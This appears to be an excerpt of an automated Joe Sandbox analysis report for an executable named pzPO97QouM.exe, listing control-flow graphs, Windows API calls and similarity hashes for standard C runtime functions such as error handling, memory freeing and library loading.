                                                                                                                                                                                                  control_flow_graph 342 9c23d1-9c23d8 343 9c23dd-9c23f8 GetLastError call 9c26a4 342->343 344 9c23da-9c23dc 342->344 347 9c23fa-9c23fc 343->347 348 9c2411-9c2413 343->348 349 9c23fe-9c240f call 9c26df 347->349 350 9c2457-9c2462 SetLastError 347->350 348->350 349->348 353 9c2415-9c2425 call 9c3f67 349->353 356 9c2439-9c2449 call 9c26df 353->356 357 9c2427-9c2437 call 9c26df 353->357 362 9c244f-9c2456 call 9c3ec5 356->362 357->356 363 9c244b-9c244d 357->363 362->350 363->362
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,009C23C8,009C209F,009C1AFC), ref: 009C23DF
                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009C23ED
                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009C2406
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,009C23C8,009C209F,009C1AFC), ref: 009C2458
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                  • Opcode ID: ef6b8ba54732f4ad57dbdc12b3b25c33a92ef472ae51419abcf8275eee2413a0
                                                                                                                                                                                                  • Instruction ID: c8eafc0c778601914b05ac472ac5f8a4162ad6a7ec36bd394ba2605036c34259
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef6b8ba54732f4ad57dbdc12b3b25c33a92ef472ae51419abcf8275eee2413a0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC017133D5E3156FA62967B8AC85F662758EB427F4B20823EF520850F5EB514C81A262

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 366 9c4424-9c4438 GetLastError 367 9c443a-9c4444 call 9c5904 366->367 368 9c4446-9c444b 366->368 367->368 375 9c448f-9c449a SetLastError 367->375 370 9c444d call 9c480c 368->370 372 9c4452-9c4458 370->372 373 9c445a 372->373 374 9c4463-9c4471 call 9c595a 372->374 376 9c445b-9c4461 call 9c4869 373->376 381 9c4476-9c448d call 9c4296 call 9c4869 374->381 382 9c4473-9c4474 374->382 383 9c449b-9c44a7 SetLastError call 9c3f24 376->383 381->375 381->383 382->376
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000008,?,009C6D69,?,?,?,009D04C8,0000002C,009C3F34,00000016,009C209F,009C1AFC), ref: 009C4428
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C445B
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4483
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 009C4490
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 009C449C
                                                                                                                                                                                                  • _abort.LIBCMT ref: 009C44A2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                  • Opcode ID: 8734942c8f99ea67b92147680506dc101ed5d3a480d0f15f27dd98d9724af7fe
                                                                                                                                                                                                  • Instruction ID: 8b73dc18d7b5e5e25116dd81c79908b6969a3ea8bf4b4fc8613adf4dd827294b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8734942c8f99ea67b92147680506dc101ed5d3a480d0f15f27dd98d9724af7fe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F07836F14640B7C616B735AC3AF2B27AE9BC07B0F35841CF428D21E5EF2188015123

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 390 9c36fc-9c3724 GetModuleHandleExW 391 9c3749-9c374d 390->391 392 9c3726-9c3739 GetProcAddress 390->392 393 9c374f-9c3752 FreeLibrary 391->393 394 9c3758-9c3765 call 9c123a 391->394 395 9c3748 392->395 396 9c373b-9c3746 392->396 393->394 395->391 396->395
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009C36AD,?,?,009C364D,?,009D02E0,0000000C,009C37A4,?,00000002), ref: 009C371C
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009C372F
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,009C36AD,?,?,009C364D,?,009D02E0,0000000C,009C37A4,?,00000002,00000000), ref: 009C3752
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                  • Opcode ID: 6f67eedf888ac964cb2838b988483cce9168ed777e1498c6a81db8fbc28677f7
                                                                                                                                                                                                  • Instruction ID: 54e6b6d92fb90f24757b8aed9898cd35fde76b1236dada3d31b3e2a602bd6a6e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f67eedf888ac964cb2838b988483cce9168ed777e1498c6a81db8fbc28677f7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8F04471E54208BBCB119B90DC4AFAEBFB8EF48756F448069F805A2151DB305E44DB92

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 400 9c634d-9c6372 call 9c3f72 403 9c637f-9c63a5 MultiByteToWideChar 400->403 404 9c6374-9c637c 400->404 405 9c63ab-9c63b7 403->405 406 9c6444-9c6448 403->406 404->403 407 9c63b9-9c63ca 405->407 408 9c6403 405->408 409 9c644a-9c644d 406->409 410 9c6454-9c6469 call 9c123a 406->410 412 9c63cc-9c63db call 9cac20 407->412 413 9c63e5-9c63eb 407->413 411 9c6405-9c6407 408->411 409->410 415 9c643d-9c6443 call 9c646a 411->415 416 9c6409-9c642b call 9c20b0 MultiByteToWideChar 411->416 412->415 426 9c63dd-9c63e3 412->426 418 9c63ec call 9c62ff 413->418 415->406 416->415 428 9c642d-9c643b GetStringTypeW 416->428 423 9c63f1-9c63f6 418->423 423->415 427 9c63f8 423->427 429 9c63fe-9c6401 426->429 427->429 428->415 429->411
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,009C54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 009C639A
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 009C63D2
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009C6423
                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009C6435
                                                                                                                                                                                                  • __freea.LIBCMT ref: 009C643E
                                                                                                                                                                                                    • Part of subcall function 009C62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009C7E5B,?,00000000,?,009C686F,?,00000004,00000000,?,?,?,009C3BCD), ref: 009C6331
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1857427562-0
                                                                                                                                                                                                  • Opcode ID: 49685a6e7199083c956885788f5bf1876ff32464be6105500993e7bb9f9946af
                                                                                                                                                                                                  • Instruction ID: 5cf8921b07982f42ea35fa03f82b3dc48f081f9906834046b234ccc74e284fed
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49685a6e7199083c956885788f5bf1876ff32464be6105500993e7bb9f9946af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0231AE72E0021AABDB299F64DC45FAE7BA9EF44310F04412DFC14D61A0E735CD51CBA2

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 430 9c561e-9c5633 GetEnvironmentStringsW 431 9c568b 430->431 432 9c5635-9c5655 call 9c55e7 WideCharToMultiByte 430->432 434 9c568d-9c568f 431->434 432->431 438 9c5657 432->438 436 9c5698-9c56a0 434->436 437 9c5691-9c5692 FreeEnvironmentStringsW 434->437 437->436 439 9c5658 call 9c62ff 438->439 440 9c565d-9c5662 439->440 441 9c5664-9c5678 WideCharToMultiByte 440->441 442 9c5680 440->442 441->442 443 9c567a-9c567e 441->443 444 9c5682-9c5689 call 9c4869 442->444 443->444 444->434
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 009C5627
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009C564A
                                                                                                                                                                                                    • Part of subcall function 009C62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009C7E5B,?,00000000,?,009C686F,?,00000004,00000000,?,?,?,009C3BCD), ref: 009C6331
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009C5670
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C5683
                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009C5692
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2278895681-0
                                                                                                                                                                                                  • Opcode ID: a8a7dfcbc6312f3fdb8baf8c988a9cde2a3acfa73019cc2f7bc1ee93d55730f9
                                                                                                                                                                                                  • Instruction ID: a1bc1788f271df9592a61629564f482fb4ca7fee390c88824446a7728ede4849
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8a7dfcbc6312f3fdb8baf8c988a9cde2a3acfa73019cc2f7bc1ee93d55730f9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C01F772E05A557F27215ABA5D4DE7B7A6DDEC2BA4357012DF904C3100EB609C0192B2

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 447 9c44a8-9c44bf GetLastError 448 9c44cd-9c44d2 447->448 449 9c44c1-9c44cb call 9c5904 447->449 451 9c44d4 call 9c480c 448->451 449->448 454 9c451e-9c4525 SetLastError 449->454 453 9c44d9-9c44df 451->453 455 9c44ea-9c44f8 call 9c595a 453->455 456 9c44e1 453->456 457 9c4527-9c452c 454->457 462 9c44fd-9c4513 call 9c4296 call 9c4869 455->462 463 9c44fa-9c44fb 455->463 458 9c44e2-9c44e8 call 9c4869 456->458 466 9c4515-9c451c SetLastError 458->466 462->454 462->466 463->458 466->457
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009C47FE,009C7E79,?,009C686F,?,00000004,00000000,?,?,?,009C3BCD,?,00000000), ref: 009C44AD
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C44E2
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4509
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009C4516
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009C451F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                  • Opcode ID: deb5d85dbfd9d086fa8f29f04105666499a754572211dcd23d5391565242dc00
                                                                                                                                                                                                  • Instruction ID: b31a37c162e21b7ef68b455ef32e37aea45167b94d122c3b53a423b6b6a530bd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: deb5d85dbfd9d086fa8f29f04105666499a754572211dcd23d5391565242dc00
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C501F476F55640AB8226BB746C66F2B326EABD13B1B35412DF829E2192EF348D015123

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 470 9c6176-9c6181 471 9c61dc-9c61de 470->471 472 9c6183-9c618b 470->472 473 9c618d-9c6193 call 9c4869 472->473 474 9c6194-9c619d 472->474 473->474 475 9c619f-9c61a5 call 9c4869 474->475 476 9c61a6-9c61af 474->476 475->476 479 9c61b8-9c61c1 476->479 480 9c61b1-9c61b7 call 9c4869 476->480 484 9c61ca-9c61d3 479->484 485 9c61c3-9c61c9 call 9c4869 479->485 480->479 484->471 488 9c61d5-9c61db call 9c4869 484->488 485->484 488->471
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C618E
                                                                                                                                                                                                    • Part of subcall function 009C4869: HeapFree.KERNEL32(00000000,00000000,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?), ref: 009C487F
                                                                                                                                                                                                    • Part of subcall function 009C4869: GetLastError.KERNEL32(?,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?,?), ref: 009C4891
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C61A0
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C61B2
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C61C4
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C61D6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 8a6188d19d29888b1a880594ed3abbb819f0df5f9a1a7e8512012c250f1cfa59
                                                                                                                                                                                                  • Instruction ID: 211baf5440b235a0af17f4f4d205bfdcefa65b53b5511614fc02001e824bbabb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a6188d19d29888b1a880594ed3abbb819f0df5f9a1a7e8512012c250f1cfa59
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CF04F33F59200BF8660EF55F991E5A77EDAA80B5139C080EF409DB592C620FC808752
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3DAD
                                                                                                                                                                                                    • Part of subcall function 009C4869: HeapFree.KERNEL32(00000000,00000000,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?), ref: 009C487F
                                                                                                                                                                                                    • Part of subcall function 009C4869: GetLastError.KERNEL32(?,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?,?), ref: 009C4891
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3DBF
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3DD2
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3DE3
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3DF4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: ac78d35d4bbe81f954df43e685fc2ac64272333a19e3bc2de1aea8e81f413ea0
                                                                                                                                                                                                  • Instruction ID: 990a0ea2732f141510adf117d220de09d90e8856b8a343d0cff7a1fdb4ee55b8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac78d35d4bbe81f954df43e685fc2ac64272333a19e3bc2de1aea8e81f413ea0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11F0307AEAE260AFD7516F15FC11B453B65A794710300425BF4025A2F1C73505C1AFC2
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\pzPO97QouM.exe,00000104), ref: 009C2F93
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C305E
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3068
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\pzPO97QouM.exe
                                                                                                                                                                                                  • API String ID: 2506810119-2218500043
                                                                                                                                                                                                  • Opcode ID: f2604e429bd5e8a58741c72a28fbd4c69f23a202193f8147c2fe41485996aab3
                                                                                                                                                                                                  • Instruction ID: ee520b9392246e334639a43aadda0a8c9befbbdd42cef3cf9e7da087dbc00460
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2604e429bd5e8a58741c72a28fbd4c69f23a202193f8147c2fe41485996aab3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24313E72E04258AFDB21DB999C81FAEBBFCEB85710F10806FF40497251D7758A40DB92
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,009C2594,00000000,?,009D1B50,?,?,?,009C2737,00000004,InitializeCriticalSectionEx,009CBC48,InitializeCriticalSectionEx), ref: 009C25F0
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,009C2594,00000000,?,009D1B50,?,?,?,009C2737,00000004,InitializeCriticalSectionEx,009CBC48,InitializeCriticalSectionEx,00000000,?,009C24C7), ref: 009C25FA
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 009C2622
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                  • Opcode ID: e641e805c9dd8d5bbe82128f423e5d9b095933e65991d5731eaf1f34a90cfa15
                                                                                                                                                                                                  • Instruction ID: 0b3e37d75aa5b932c1ff55e4e60dddbe6ab37cdfd4a6f9c995de02ba7365be1c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e641e805c9dd8d5bbe82128f423e5d9b095933e65991d5731eaf1f34a90cfa15
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BE0DF30E84304BBEF211B60EC07F1A3F18BB00B82F100025F90CE80E2E7B1EE50A956
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,009C5784,00000000,00000000,00000000,00000000,?,009C5981,00000006,FlsSetValue), ref: 009C580F
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,009C5784,00000000,00000000,00000000,00000000,?,009C5981,00000006,FlsSetValue,009CC4D8,FlsSetValue,00000000,00000364,?,009C44F6), ref: 009C581B
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009C5784,00000000,00000000,00000000,00000000,?,009C5981,00000006,FlsSetValue,009CC4D8,FlsSetValue,00000000), ref: 009C5829
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                  • Opcode ID: 86175008adfc11fe0872889424599e16ca9ca15271d5cc3567b7c9384d3428af
                                                                                                                                                                                                  • Instruction ID: 49f5b4282fce75f3f1a820e1a5c66b571c97b53a1d78262a57be8c2f58287dc7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86175008adfc11fe0872889424599e16ca9ca15271d5cc3567b7c9384d3428af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E01AC32E19626ABC7218A689C45F57775CAF057A1B120528F916D7140D724ED81C6E1
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4A27
